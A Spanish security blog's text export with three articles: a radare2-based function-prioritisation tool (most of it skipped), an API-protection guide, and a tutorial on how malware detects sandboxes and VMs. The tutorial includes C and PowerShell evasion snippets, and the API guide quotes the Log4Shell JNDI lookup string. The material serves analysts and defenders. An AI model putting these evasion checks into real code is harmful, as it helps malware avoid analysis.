# CIBERSEGURIDAD .blog > ciberseguridad.blog es un medio independiente en español sobre seguridad informática, nacido en 2017 y cocinado a fuego lento por profesionales que trabajan en el sector. Publicamos artículos de fondo, guías prácticas y noticias sobre vulnerabilidades, ataques, malware, privacidad y herramientas, pensados para quien se dedica a la ciberseguridad y para quien quiere entrar en ella. Texto completo del contenido publicado en https://ciberseguridad.blog/ (218 artículos, 6 páginas). Idioma: es (español, es-ES). Índice: https://ciberseguridad.blog/llms.txt --- # Del binario al comportamiento: priorización automática de funciones mediante heurísticas estructurales URL: https://ciberseguridad.blog/del-binario-al-comportamiento-priorizacion-automatica-de-funciones-mediante-heuristicas-estructurales/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2026-07-17 Actualizado: 2026-10-08 Tema: Aplicaciones y Herramientas > Análisis de malware guiado por heurísticas: prioriza funciones, detecta capacidades y renombra código automáticamente. Herramienta en Python (Flask + radare2) incluida. Cuando se analiza un binario desconocido, lo primero que uno intenta hacer es entender por dónde empezar. Un ejecutable puede tener cientos o miles de funciones, y la mayoría no dicen nada interesante a simple vista. Muchas son rutinas auxiliares, llamadas a librerías o pequeñas piezas de código que solo sirven para tareas repetitivas. El problema real es cómo encontrar, dentro de todo ese ruido, las partes que realmente importan. Hay dos caminos clásicos para empezar ese análisis. El primero es ir al punto de entrada del programa, la función inicial que se ejecuta cuando el binario arranca. Desde ahí se intenta seguir el flujo del programa paso a paso, como si se leyera una historia desde el principio. El segundo camino es más directo: buscar pistas dentro del propio binario, como cadenas de texto o llamadas a funciones del sistema. Las cadenas de texto suelen ser un buen punto de partida. En muchos casos, un programa deja rastros claros: direcciones IP, nombres de archivos, rutas del sistema o mensajes de error. Esas cadenas pueden llevarnos directamente a zonas del código donde ocurre algo importante. Por ejemplo, si aparece una dirección de servidor, es probable que el código relacionado tenga que ver con comunicación de red. Si aparece el nombre de un programa o un servicio concreto, puede indicar integración con ese sistema. Algo parecido ocurre con las funciones importadas. Muchos programas dependen de funciones del sistema operativo para realizar tareas como escribir en disco, capturar pantalla o manejar memoria. Si se observan las importaciones, se pueden identificar comportamientos típicos. Por ejemplo, ciertas funciones de captura de pantalla o de red suelen aparecer en malware o en herramientas de monitorización. El problema de este enfoque es que no siempre funciona. Cada vez es más común encontrar binarios donde las cadenas están cifradas o construidas en tiempo de ejecución. También hay programas que resuelven sus funciones dinámicamente, lo que significa que no aparecen en la lista de importaciones. En esos casos, tanto las cadenas como las importaciones dejan de ser útiles como guía. Además, hay tipos de código que no se detectan fácilmente con este método. Funciones relacionadas con protocolos de red, sistemas de cifrado, lógica interna compleja o mecanismos de control suelen estar ocultos entre muchas otras funciones sin importancia aparente. No hay una etiqueta clara que diga “esto es interesante”. Por eso, depender solo de cadenas e importaciones es insuficiente. La pregunta entonces es cómo encontrar código relevante sin depender de pistas evidentes. Es decir, cómo identificar automáticamente qué partes de un binario merecen atención cuando no hay información directa. La respuesta está en el uso de heurísticas. Una heurística no es una regla exacta, sino una forma de estimar qué es probable que sea interesante. En lugar de buscar una firma concreta, se buscan patrones generales que suelen aparecer en código relevante. Estos patrones no garantizan resultados perfectos, pero reducen mucho el espacio de búsqueda. ## Código 15. Presentación de hallazgos ```

📈 Resumen de Auto-Renombrado Contextual

Se identificaron y renombraron funciones de forma automática.

Función Original CC Capacidades Identificadas (Tags)
``` Para arrancar la herramienta: python3 app.py y os conectáis con el navegador a 127.0.0.1:5001 y ¡listo! Espero que os haya gustado y nos vemos en el siguiente POST!!! --- # Cómo proteger las APIs en 2025: La guía definitiva que todo CISO necesita URL: https://ciberseguridad.blog/como-proteger-las-apis-en-2025-la-guia-definitiva-que-todo-ciso-necesita/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2025-08-05 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Las APIs son ya el mayor riesgo para tu empresa. Protégete con IA, detección de anomalías y defensa activa antes de que sea demasiado tarde. Las APIs han pasado de ser un componente técnico secundario a convertirse en el principal vector de amenaza para las organizaciones modernas. Si eres CISO o profesional de ciberseguridad, esta realidad debería mantenerte alerta: 99% de las empresas sufrieron incidentes de seguridad en sus APIs el último año, y el 22% reportó brechas de datos directamente relacionadas con fallos en la protección de APIs. Pero aquí está la parte que realmente debería captar tu atención: mientras los ataques evolucionan exponencialmente, las herramientas de defensa también están experimentando una revolución silenciosa. Desde WAF potenciados con inteligencia artificial hasta técnicas de detección que aprenden del comportamiento de los atacantes, el panorama de la seguridad APIs está cambiando más rápido de lo que muchos profesionales pueden seguir. ## La revolución silenciosa en la protección de APIs ### El nuevo paradigma: de WAF tradicionales a WAAP inteligentes Algo fundamental está cambiando en la ciberseguridad en APIs. Los firewalls tradicionales de aplicaciones web (WAF) están evolucionando hacia soluciones WAAP (Web Application and API Protection) que no solo bloquean amenazas conocidas, sino que aprenden y se adaptan a nuevos vectores de ataque. La diferencia es revolucionaria. Mientras un WAF tradicional como ModSecurity depende de reglas predefinidas para detectar inyecciones SQL o XSS, las nuevas generaciones de herramientas incorporan machine learning para identificar patrones anómalos que nunca antes habían visto. Un ejemplo real que cambió todo: Cuando apareció la vulnerabilidad Log4Shell en 2021, los WAF tradicionales no podían detectar la cadena ${jndi:ldap://...} porque no existía una regla específica para ello. Sin embargo, herramientas como open-appsec, que utilizan modelos de IA, pudieron bloquear automáticamente estos ataques de día-cero sin necesidad de actualizaciones manuales de reglas. ### La amenaza invisible: shadow APIs y el 90% desconocido Aquí tienes un dato que debería preocupar a cualquier CISO: solo el 10% de las organizaciones documentan completamente sus APIs. Esto significa que el 90% restante opera con endpoints potencialmente desprotegidos, lo que la industria denomina "Shadow APIs" o "Zombie APIs". Estas APIs fantasma representan uno de los mayores riesgos de seguridad actuales porque: - Son invisibles para los controles de seguridad tradicionales - Carecen de monitorización y políticas de acceso - Operan con versiones obsoletas que pueden contener vulnerabilidades conocidas - Procesan datos sensibles sin la supervisión adecuada La solución emergente combina descubrimiento automatizado con protección inmediata. ( Quedaros esto en la cabeza ) Herramientas como OWASP APIClarity, teniendo en cuenta también los WAAP/WAD comerciales, pueden escanear el tráfico en Kubernetes y detectar patrones de API no documentadas, aplicando automáticamente políticas de seguridad por defecto hasta que se gestionen adecuadamente. ## Herramientas de próxima generación: más allá de ModSecurity Antes de profundizar en las herramientas específicas, es importante aclarar nuestro enfoque. Si bien existen soluciones comerciales robustas de proveedores como Cloudflare, Imperva, Akamai,Forti, CheckPoint, A10 ... o F5 que ofrecen capacidades avanzadas de protección de APIs, en este análisis nos centraremos en alternativas open source por una razón fundamental: la democratización de la ciberseguridad. Las herramientas de código abierto permiten que organizaciones de cualquier tamaño desde startups hasta grandes corporaciones accedan a tecnologías de ciberseguridad de nivel enterprise sin las barreras económicas de las licencias comerciales. Es crucial entender que las funcionalidades que exploraremos detección con inteligencia artificial, validación de esquemas, protección contra ataques día-cero no son exclusivas del mundo open source, por el contrario, estas características están ampliamente disponibles en las soluciones comerciales, a menudo con interfaces más pulidas y soporte empresarial dedicado. Sin embargo, la flexibilidad, transparencia y capacidad de personalización que ofrecen las herramientas open source, combinadas con comunidades activas que impulsan la innovación continua, las convierten en opciones extraordinariamente viables para implementar estrategias sólidas de ciberseguridad en APIs. ### Open-appsec: cuando la IA revoluciona la protección de APIs [Imagen: Open-App Sec] Si aún confías únicamente en reglas estáticas para proteger tus APIs, estás luchando con herramientas del pasado. Open-appsec ( De CheckPoint pero Open Source ) representa una nueva generación de WAF que utiliza machine learning para detectar amenazas que nunca han sido catalogadas. Lo impresionante de esta aproximación es su capacidad de prevención proactiva. Mientras ModSecurity con OWASP CRS detecta aproximadamente el 70% de patrones maliciosos conocidos, open-appsec ha demostrado detectar ataques Zero Day como Log4Shell sin necesidad de firmas específicas. ¿El secreto? Su motor ML aprende del tráfico benigno normal y bloquea automáticamente cualquier desviación sospechosa, funcionando como un modelo de seguridad positiva adaptativo. ### Coraza WAF: la evolución moderna de ModSecurity [Imagen: Coraza WAF] Con el fin de vida (EoL) de ModSecurity en varias plataformas durante 2024, Coraza emerge como la alternativa moderna que mantiene compatibilidad con OWASP CRS mientras ofrece rendimiento superior y mayor facilidad de integración en arquitecturas cloud-native. Desarrollado en Go, Coraza puede ejecutarse como contenedor en Kubernetes o embeberse en proxies, ofreciendo la flexibilidad que demandan las arquitecturas de microservicios modernas. Su capacidad de procesar reglas existentes de ModSecurity garantiza una migración sin disrupciones. ### Wallarm API Firewall: seguridad positiva basada en esquemas [Imagen: WALLARM] Una de las innovaciones más interesantes en protección de APIs es el enfoque de validación de esquemas. Wallarm API Firewall implementa un modelo de seguridad positiva que solo permite tráfico que cumple exactamente con la especificación OpenAPI/Swagger o el esquema GraphQL definido. Esta aproximación es revolucionaria porque: - Bloquea ataques Zero Day automáticamente si no se ajustan al contrato de la API - Descubre APIs shadow al detectar peticiones a endpoints no documentados - Valida JWT para autenticación OAuth2 y mantiene denylists de tokens comprometidos - Previene la manipulación de datos rechazando campos o tipos inesperados ### Chaitin SafeLine: el WAF asiático que está conquistando occidente [Imagen: SafeLine WAF] Con más de 17,000 estrellas en GitHub, SafeLine representa una nueva generación de WAF open source que combina protección tradicional con funcionalidades avanzadas de WAAP. Sus capacidades van más allá del filtrado básico: - Detección de bots sofisticados con desafíos CAPTCHA adaptativos - Ofuscación dinámica de código HTML/JS para dificultar la automatización maliciosa - Métricas de eficacia superior: detecta más del 76% de muestras de ataque con menos del 0.3% de falsos positivos La integración con gateways como Apache APISIX ha demostrado resultados excepcionales, bloqueando el 100% de intentos de inyección y XSS en APIs públicas durante períodos de monitorización de 3 meses. ## La paradoja de GraphQL: mayor flexibilidad, mayores riesgos ### Por qué los WAF tradicionales fallan con GraphQL GraphQL presenta un desafío único para la seguridad de APIs tradicional. A diferencia de REST, donde cada endpoint tiene una función específica, GraphQL utiliza una única URL donde los clientes construyen consultas complejas y dinámicas. El problema fundamental: los WAF tradicionales ven las consultas GraphQL como blobs de texto opaco. Pueden detectar patrones obvios como inyecciones SQL dentro de las consultas, pero no entienden la lógica GraphQL ni pueden evaluar si una consulta es abusiva por su complejidad estructural. ATENTOS : Estudios han demostrado que muchos WAF generan tantos falsos positivos con tráfico GraphQL que los administradores terminan excluyendo completamente la URL /graphql del filtrado, dejando las APIs completamente desprotegidas. ### Ataques únicos de GraphQL que debes conocer Los vectores de amenaza en GraphQL van más allá de las vulnerabilidades web tradicionales: - Abuso de introspección: Los atacantes pueden usar consultas __schema para obtener el mapa completo de la API, incluyendo operaciones ocultas y campos sensibles que no deberían ser públicos. - Ataques de complejidad: Consultas anidadas profundamente pueden consumir recursos exponenciales del servidor. Un ejemplo real: una consulta que solicite usuarios → posts → comentarios → respuestas en 10 niveles de profundidad puede generar millones de operaciones de base de datos. - Denegación de servicio por volumen: Un atacante puede solicitar listas enormes sin paginación, extrayendo potencialmente toda la base de datos en una sola consulta. ### Estrategias de protección avanzadas para GraphQL La protección efectiva de GraphQL requiere un enfoque multicapa: - Validación de esquemas en tiempo real: Herramientas como Wallarm API Firewall pueden validar cada consulta contra el esquema GraphQL conocido, rechazando automáticamente cualquier campo o tipo no autorizado. - Límites de complejidad algorítmica: Implementar análisis de costes que asignen "puntos" a cada campo solicitado y establezcan un límite máximo por consulta. Apollo Server, por ejemplo, puede configurarse para rechazar consultas que excedan 1000 puntos de complejidad. - Persisted queries: Para aplicaciones móviles o clientes controlados, limitar el servidor a aceptar solo consultas pre-registradas con hash conocido, eliminando completamente las consultas arbitrarias. ## gRPC: el desafío invisible para la seguridad tradicional ### La brecha de visibilidad en APIs binarias Mientras REST y SOAP utilizan texto legible (JSON/XML), gRPC intercambia mensajes binarios usando Protocol Buffers sobre HTTP/2. Esta diferencia fundamental crea una brecha significativa en las herramientas de ciberseguridad tradicionales. La mayoría de WAF open source no pueden analizar el contenido de mensajes gRPC porque requieren decodificar ProtoBuf usando el esquema .proto específico de cada API. Para un WAF tradicional, el tráfico gRPC aparece como un flujo HTTP/2 con payload opaco. ### Estrategias emergentes para proteger gRPC - API gateways con transcoding: Usar proxies como Envoy que conviertan gRPC a REST/JSON en el borde, permitiendo aplicar WAF tradicional sobre la representación textual. (Aunque esto seria una arquitectura muy compleja , podria funcionar perfectamente ) - Validación a nivel de aplicación: Utilizar bibliotecas como protoc-gen-validate que generan automáticamente validadores para cada campo del mensaje, actuando como un firewall embebido en la aplicación. - Autenticación mTLS robusta: Aprovechar que gRPC se basa en HTTP/2 para implementar autenticación mutua de certificados, garantizando que solo clientes autorizados puedan establecer conexiones. ## RASP: la última línea de defensa que está cambiando el juego ### Cuando el WAF no es suficiente Los Runtime Application Self-Protection (RASP) representan una evolución fundamental en la protección de APIs. Mientras los WAF actúan como un perímetro externo, RASP se integra directamente en la aplicación, monitorizando llamadas sensibles desde el interior. OpenRASP de Baidu ha demostrado en casos reales su capacidad para detectar ataques que logran evadir WAF perimetrales. En un ejemplo documentado, un payload de inyección SQL ofuscado pasó desapercibido para ModSecurity, pero OpenRASP lo detectó al momento de ejecutarse la consulta en la base de datos. ### La precisión quirúrgica del RASP La ventaja distintiva del RASP es su conocimiento del contexto interno de la aplicación. Puede distinguir entre una consulta SQL legítima generada por el código y una manipulada por un atacante, logrando detección con prácticamente cero falsos positivos. Caso real de Baidu: En una aplicación financiera que manejaba APIs REST internas, OpenRASP detectó intentos de deserialización maliciosa interceptando clases peligrosas al momento de carga, incluso cuando el ataque había eludido las defensas perimetrales. El overhead de rendimiento reportado fue de apenas 4%, considerado aceptable para la seguridad añadida, especialmente en aplicaciones críticas donde el costo de una brecha puede ser devastador. ## El factor humano: detección de anomalías basada en comportamiento ### Más allá de las firmas: entendiendo patrones de uso Una de las innovaciones más prometedoras en ciberseguridad de APIs es el análisis de comportamiento del usuario y entidad (UEBA) aplicado específicamente a APIs. Esta aproximación reconoce que muchas brechas exitosas no explotan vulnerabilidades técnicas, sino fallas en la lógica de autorización. El problema de BOLA (Broken Object Level Authorization) sigue siendo el riesgo #1 según OWASP API Top 10 2023. Un atacante con credenciales válidas puede acceder a datos de otros usuarios simplemente modificando IDs en las peticiones. Esto es prácticamente imposible de detectar con WAF tradicionales porque la solicitud es técnicamente válida. ### Detección de anomalías con machine learning Las soluciones emergentes utilizan algoritmos de aprendizaje no supervisado para modelar el comportamiento normal de cada usuario o sistema: - Patrones de acceso típicos: Si un usuario normalmente accede a 10-15 recursos por sesión, un acceso súbito a 1000 recursos diferente indica posible scraping o enumeración. - Secuencias de endpoints: Los usuarios legítimos siguen patrones predecibles (login → perfil → datos). Desviaciones significativas pueden indicar automatización maliciosa. - Análisis temporal: Accesos desde múltiples ubicaciones geográficas simultáneamente o actividad fuera de horarios normales. Elastic Stack con ML puede implementar estas capacidades usando sus módulos de detección de anomalías, analizando logs de API para identificar desviaciones estadísticamente significativas en el comportamiento de usuarios. ## DevSecOps: la seguridad de APIs desde el código ### Shift-left: detectar vulnerabilidades antes del despliegue La tendencia hacia "API Security as Code" está transformando cómo las organizaciones abordan la protección de APIs. En lugar de depender únicamente de controles perimetrales, la seguridad se integra en cada fase del ciclo de desarrollo. Schemathesis representa esta nueva generación de herramientas. Utiliza especificaciones OpenAPI para generar automáticamente casos de prueba que buscan vulnerabilidades específicas de APIs, incluyendo: - Fuzzing inteligente basado en tipos de datos definidos en el esquema - Pruebas de autorización verificando que cada endpoint requiere autenticación apropiada - Validación de respuestas asegurando que no se filtren datos sensibles accidentalmente ### Testing de seguridad continuo La integración de escáneres como OWASP ZAP en pipelines CI/CD permite detectar regresiones de seguridad automáticamente. Cada commit puede desencadenar pruebas que: - Verifican que nuevos endpoints siguen políticas de seguridad establecidas - Detectan APIs shadow introducidas inadvertidamente - Validan que cambios no rompan controles de autorización existentes Purple teaming para APIs: Los equipos de desarrollo (blue) colaboran con pentesters (red) para crear y mantener suites de pruebas maliciosas que evolucionan con las amenazas. ## Casos reales que están definiendo el futuro ### El caso Kubernetes: ModSecurity en la era de microservicios Una implementación particularmente exitosa involucra el uso de Ingress NGINX con ModSecurity y OWASP CRS en clústeres Kubernetes. Esta configuración permite que cada petición a microservicios pase primero por un filtro de seguridad centralizado. Resultados documentados: Tras implementar esta arquitectura, una serie de ataques de escaneo automatizado buscando vulnerabilidades como phpMyAdmin fueron detenidos con códigos 403, reduciendo significativamente la carga de procesamiento en los microservicios backend. El desafío inicial fueron los falsos positivos: payloads JSON legítimos que contenían etiquetas SVG codificadas fueron interpretados como XSS hasta ajustar las reglas específicamente para esos casos de uso. ### Integración Apache APISIX + Chaitin SafeLine Un estudio detallado de API7.ai documentó la integración de Apache APISIX como gateway con SafeLine como WAF externo. Los resultados fueron impresionantes: - 100% de detección de inyecciones SQL y XSS durante 3 meses de monitoreo - Latencia mínima añadida (milisegundos por llamada) - Gestión centralizada de políticas sin necesidad de reiniciar servicios Un caso específico: un payload de ejecución remota de código (RCE) ofuscado en base64 que el gateway por sí solo no habría detectado fue identificado y bloqueado por SafeLine, demostrando el valor de la defensa en profundidad. ### OpenRASP en entornos financieros críticos Baidu documentó la implementación de OpenRASP en una aplicación financiera que procesaba transacciones móviles. A pesar de contar con WAF perimetral, querían una última línea de defensa. Resultado: OpenRASP detectó intentos de explotación que habían eludido el firewall externo, incluyendo ataques de deserialización Java que fueron interceptados antes de ejecutarse, previniendo potenciales compromisos del sistema. ## Las nuevas tendencias que ya estan aquí ### IA generativa como arma de doble filo La explosión de IA generativa está creando un panorama de amenazas completamente nuevo. Los atacantes pueden usar herramientas como GPT-4 para generar variaciones sofisticadas de ataques que evadan WAF tradicionales. Pero la IA también está potenciando las defensas. Las soluciones emergentes utilizan Large Language Models (LLMs) para revisar automáticamente definiciones de APIs y código en busca de errores de seguridad, actuando como asistentes de seguridad que entienden tanto el contexto técnico como las mejores prácticas. ### APIs event-driven: el próximo desafío El crecimiento de arquitecturas event-driven con WebSockets, Kafka y MQTT está expandiendo la definición de "API Security" más allá de HTTP tradicional. La seguridad de canales persistentes y mensajería asíncrona requerirá nuevos enfoques: - Autenticación en canales de larga duración - Autorización de suscripciones a tópicos - Validación de mensajes asincrónicos ### Regulación y compliance: el impulso definitivo La presión regulatoria está acelerando la adopción de controles de seguridad API. PCI DSS 4.0 incluye requerimientos más explícitos para componentes de aplicaciones, y iniciativas como la Guía NSA/CISA sobre Seguridad API están estableciendo estándares gubernamentales. Esta tendencia hacia compliance obligará a las organizaciones a demostrar controles documentados sobre sus APIs ( Recordemos que solo lo hacen un 10% ), incluyendo inventarios completos, pruebas de seguridad regulares y monitorización continua. ## Construyendo tu estrategia de protección de APIs ### El enfoque múlticapa La protección efectiva de APIs requiere una estrategia integral que combine: 1. Descubrimiento continuo: Identificar y catalogar todas las APIs, incluyendo shadow APIs 2. Validación perimetral: WAF/WAAP modernos con capacidades de IA para detección proactiva 3. Controles de aplicación: RASP y validación de esquemas para protección interna 4. Monitorización de comportamiento: Detección de anomalías basada en patrones de uso 5. Testing continuo: Integración de pruebas de seguridad en el ciclo de desarrollo ### Métricas que importan Para medir la efectividad de tu programa de seguridad API, enfócate en: - Tiempo de detección de APIs shadow nuevas - Tasa de falsos positivos en controles automatizados - Cobertura de testing de endpoints críticos - Tiempo medio de respuesta a incidentes de seguridad API ## Conclusión: la seguridad de APIs como ventaja competitiva La ciberseguridad de APIs ha evolucionado de ser un requisito técnico a convertirse en un diferenciador estratégico. Las organizaciones que implementen estrategias avanzadas de protección no solo reducirán su riesgo de brechas, sino que podrán innovar más rápidamente al tener confianza en la ciberseguridad de su infraestructura digital. Las herramientas y técnicas open source que hemos visto a lo largo del post, representan una oportunidad única: acceder a capacidades de seguridad de nivel enterprise sin los costes prohibitivos de soluciones comerciales. Pero esto requiere inversión en conocimiento especializado y configuración cuidadosa. El futuro pertenece a las organizaciones que combinen herramientas inteligentes con procesos maduros, creando ecosistemas de APIs que sean tanto ágiles como seguras. > En un mundo donde las APIs procesan más del 80% del tráfico web, no protegerlas adecuadamente no es solo un riesgo técnico es un riesgo existencial para el negocio. La pregunta ya no es si necesitas una estrategia avanzada de seguridad APIs, sino cómo de rápido puedes implementarla antes que tus competidores o de que los atacantes tomen ventaja de tus vulnerabilidades. --- # Cómo el malware detecta sandboxes y máquinas virtuales: Técnicas y ejemplos URL: https://ciberseguridad.blog/como-el-malware-detecta-sandboxes-y-maquinas-virtuales-tecnicas-y-ejemplos/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2025-07-31 Actualizado: 2026-10-04 Tema: Herramientas para hackear > El malware evade análisis detectando sandboxes y máquinas virtuales mediante técnicas de antianálisis avanzadas. ¡ DESCUBRELAS ! En el mundo de la ciberseguridad, una de las estrategias más importantes para analizar y entender cómo funciona un malware es ejecutarlo en un entorno controlado, como una sandbox (caja de arena) o una máquina virtual (VM). Sin embargo, los desarrolladores de malware lo saben muy bien, y por eso han creado métodos sofisticados para detectar cuándo están siendo observados. En este artículo, exploraremos de forma sencilla y con ejemplos reales, cómo el malware puede detectar si se está ejecutando en un entorno de virtualización o análisis. ## ¿Qué es una sandbox o una máquina virtual? Antes de entrar en detalles, aclaremos estos conceptos: - Máquina virtual (VM): Es un software que emula un sistema operativo completo. Permite ejecutar un sistema operativo (como Windows o Linux) dentro de otro, aislado del resto. Ejemplos: VirtualBox, VMware, Hyper-V. - Sandbox: Es un entorno seguro donde se ejecuta software (como un malware) para observar su comportamiento. Suele estar muy automatizado y monitorea cosas como accesos a archivos, red, procesos, etc. Los analistas de malware usan estas herramientas para "engañar" al malware y ver qué hace. Pero los creadores de malware quieren evitar ser descubiertos. ¿Cómo lo hacen? Veámoslo. ## ¿Por qué los malware detectan las sandboxes? Detectar una VM o una sandbox permite al malware: - Evitar ser analizado. - No ejecutar el payload o carga útil real si se detecta que está siendo observado. - Cambiar su comportamiento dependiendo del entorno. - Burlar sistemas automáticos de detección como antivirus basados en comportamiento. ## Técnicas de detección de entornos de virtualización A continuación, te presento las principales técnicas que usan los malware para detectar si están siendo ejecutados en un entorno de análisis. No sin antes mostrar una serie de análisis en la plataforma Any.run en donde podemos encontrar todo lo que se va a ver en el artículo, os los dejo en referencias al final del mismo por si queréis profundizar en alguno de ellos. ### 1. Detección de procesos y servicios sospechosos Algunas sandboxes o entornos de análisis ejecutan servicios o procesos conocidos. El malware puede buscar procesos como: - vmsrvc.exe (VMware) - vmtoolsd.exe (VMware Tools) - VBoxService.exe (VirtualBox Guest Additions) - Wireshark.exe (herramienta de análisis de red) - ollydbg.exe, x64dbg.exe (debuggers) [Imagen: Detección de procesos] Una de las formas más comunes que usan los malware para comprobar si están siendo ejecutados en una sandbox es revisar los procesos en ejecución en el sistema. Esto les permite buscar herramientas típicas de análisis como las que se muestran en la captura. La forma más habitual de hacerlo en sistemas Windows es utilizando tres funciones de la API de Windows: - CreateToolhelp32Snapshot: Toma una "foto" de los procesos actuales del sistema. - Process32First: Obtiene el primer proceso de la lista. - Process32Next: Recorre el resto de los procesos. Estas funciones permiten al malware enumerar todos los procesos activos y buscar nombres sospechosos. #### Ejemplo en código en C: ```C HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 pe; pe.dwSize = sizeof(PROCESSENTRY32);   if (Process32First(hSnapshot, &pe)) {     do {         if (strcmp(pe.szExeFile, "VBoxService.exe") == 0) {             ExitProcess(0); // Detectado entorno virtual         }     } while (Process32Next(hSnapshot, &pe)); } ``` ### 2. Inspección de drivers o dispositivos del sistema El malware puede mirar los drivers instalados o los dispositivos virtuales que delatan un entorno de virtualización. En lugar de intentar abrir el archivo, lo cual podría generar alertas o errores, el malware simplemente consulta sus atributos usando la función GetFileAttributesA de la API de Windows como se verá en la siguiente captura. Devuelve los atributos del archivo o carpeta especificada. Si el archivo no existe, la función devuelve INVALID_FILE_ATTRIBUTES. Esto permite al malware detectar de forma muy discreta si ciertos archivos están presentes. [Imagen: Inspección de drivers] #### Archivos típicos que se buscan: - C:\Windows\System32\drivers\VBoxMouse.sys (VirtualBox) - C:\Windows\System32\drivers\vmhgfs.sys (VMware) - C:\Program Files\VMware\VMware Tools\vmtoolsd.exe - C:\Windows\System32\vboxservice.exe Este tipo de detección es muy utilizada porque no necesita privilegios especiales y funciona en prácticamente todas las versiones de Windows. #### Código en PowerShell para detectarlos: ``` Get-WmiObject Win32_SystemDriver | Where-Object { $_.Name -like "*vm*" } ``` ### 3. Detección de artefactos del sistema de archivos o del registro Una de las formas más sencillas y efectivas que utilizan los malware para detectar si están en un entorno de virtualización o sandbox es buscar huellas o “artefactos” en el sistema de archivos y en el registro de Windows. Estas huellas son elementos que suelen dejar las herramientas de virtualización o análisis y que no suelen aparecer en ordenadores reales. #### ¿Qué tipo de artefactos se buscan? - Archivos específicos instalados por programas como VMware, VirtualBox, QEMU o herramientas de análisis. [Imagen: Código desensamblado comprobando archivos de VirtualBox como vboxservice.exe para detectar sandboxes] - Entradas del registro de Windows que indican que el sistema está siendo emulado o monitorizado. [Imagen: Entradas en registro] #### Ejemplos comunes de archivos sospechosos: Ruta del archivo Descripción C:\Windows\System32\drivers\VBoxMouse.sys Driver del ratón virtual de VirtualBox C:\Windows\System32\VBoxControl.exe Herramienta de control de VirtualBox C:\Program Files\VMware\VMware Tools\vmtoolsd.exe Servicio de VMware Tools C:\Windows\System32\drivers\vmmouse.sys Driver del ratón de VMware #### Ejemplos comunes de claves del registro: Clave Indicador HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Detecta VirtualBox HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\VMware Detecta VMware HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest Detecta VirtualBox Guest Additions HKEY_LOCAL_MACHINE\SOFTWARE\Wine Detecta que el entorno usa Wine (entorno Linux emulando Windows) #### ¿Cómo lo detecta el malware? El malware puede utilizar funciones como: - GetFileAttributesA → Para saber si un archivo existe sin abrirlo. - RegOpenKeyEx y RegQueryValueEx → Para leer el registro de Windows. #### Ejemplo de detección con GetFileAttributesA: ```C if (GetFileAttributesA("C:\\Windows\\System32\\VBoxControl.exe") != INVALID_FILE_ATTRIBUTES) {     ExitProcess(0); // Se detectó VirtualBox } ``` #### Ejemplo de detección del registro en C: ```C HKEY hKey; if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "HARDWARE\\ACPI\\DSDT\\VBOX__", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {     RegCloseKey(hKey);     ExitProcess(0); // VirtualBox detectado } ``` ### 4. Verificación del hardware (CPU, RAM, disco) Una de las formas más comunes que usan los malware para detectar entornos artificiales como máquinas virtuales o sandboxes es comprobar los recursos de hardware disponibles. Esto se debe a que muchas veces estos entornos tienen: - Poca memoria RAM (1 o 2 GB) - Solo 1 núcleo de CPU - Poco espacio en disco (menos de 100 GB) El malware sabe que esto es típico de entornos de análisis mal configurados o automatizados. En cambio, los equipos reales suelen tener más recursos. #### Por lo tanto, ¿Qué recursos suele comprobar el malware? - Memoria RAM total del sistema. - Espacio libre o total del disco principal. - Número de núcleos de CPU. #### ¿Cómo lo hace en la práctica? Vamos a ver un fragmento de código real, muy similar a lo que utilizan muchos malware (incluidos algunos ransomware y troyanos bancarios): [Imagen: Verificación de Hardware] #### ¿Qué está haciendo este código? 1. GlobalMemoryStatusEx obtiene la memoria RAM total. : Si hay menos de 4 GB, se considera sospechoso. 2. GetDiskFreeSpaceExA comprueba el tamaño del disco C:\ : Si hay menos de 100 GB de espacio, también es sospechoso. 3. GetSystemInfo obtiene el número de procesadores lógicos (núcleos): Si hay 1 núcleo o menos, el entorno es considerado artificial. #### Curiosamente, es una de las comprobaciones que se realizan en Any.run con lo que es detectada la plataforma. [Imagen: Detección Any.run] #### Ejemplo de detección en C: ```C DisplayDevice.cb = 64; GlobalMemoryStatusEx((LPMEMORYSTATUSEX)&DisplayDevice); if ( *(_QWORD *)&DisplayDevice.DeviceName[4] >> 20 <= 0x1000ui64 ) { // Menos de 4 GB de RAM → sospechoso strcat_s(lpThreadParameter + 16, 0x400ui64, "Low memory (<=4GB);"); } // Comprobación de tamaño de disco if ( GetDiskFreeSpaceExA("C:\\", (PULARGE_INTEGER)&Size, (PULARGE_INTEGER)&hKey, (PULARGE_INTEGER)&DisplayDevice) && HIDWORD(hKey) < 0x19 ) { // Menos de 100 GB de espacio en disco → sospechoso strcat_s(lpThreadParameter + 16, 0x400ui64, "Small disk (<100GB);"); } // Comprobación del número de CPUs GetSystemInfo((LPSYSTEM_INFO)&DisplayDevice); if ( *(_DWORD *)&DisplayDevice.DeviceName[28] <= 1u ) { // Solo 1 núcleo → muy típico en VMs strcat_s(lpThreadParameter + 16, 0x400ui64, "Too few CPU cores;"); } ``` ### 5. Consulta del nombre del sistema, usuario o red Algunas sandboxes tienen nombres genéricos como: - Nombre de máquina: SANDBOX-PC, JOHN-PC, ANALYSIS-PC - Nombre de usuario: admin, user, test [Imagen: Cambio nombre de sistema] El malware puede comprobar esto, cambio de lenguaje, así vemos más variedad: #### Ejemplo de detección en Powershell: ```C $computerName = $env:COMPUTERNAME if ($computerName -like "*SANDBOX*") { exit } ``` ### 6. Detección de tiempos anormales (timing attacks) Una técnica avanzada pero muy utilizada por malware es la detección de anomalías en el tiempo de ejecución. En una sandbox o una máquina virtual, las operaciones pueden ser más lentas o no reflejar el tiempo real debido a: - La monitorización constante de llamadas al sistema. - La emulación de hardware. - Interrupciones artificiales que ralentizan el sistema. El malware puede aprovechar estas inconsistencias para detectar que no está en un entorno “normal”. #### ¿Cómo detecta el malware estas anomalías? Utilizando funciones que miden el tiempo real, y comparando el resultado contra lo esperado. Si la ejecución de una instrucción simple (como Sleep(1)) tarda más de lo normal, o si la precisión del reloj de alto rendimiento es inconsistente, el malware lo interpreta como una señal de sandbox. Veamos un ejemplo real adaptado de código 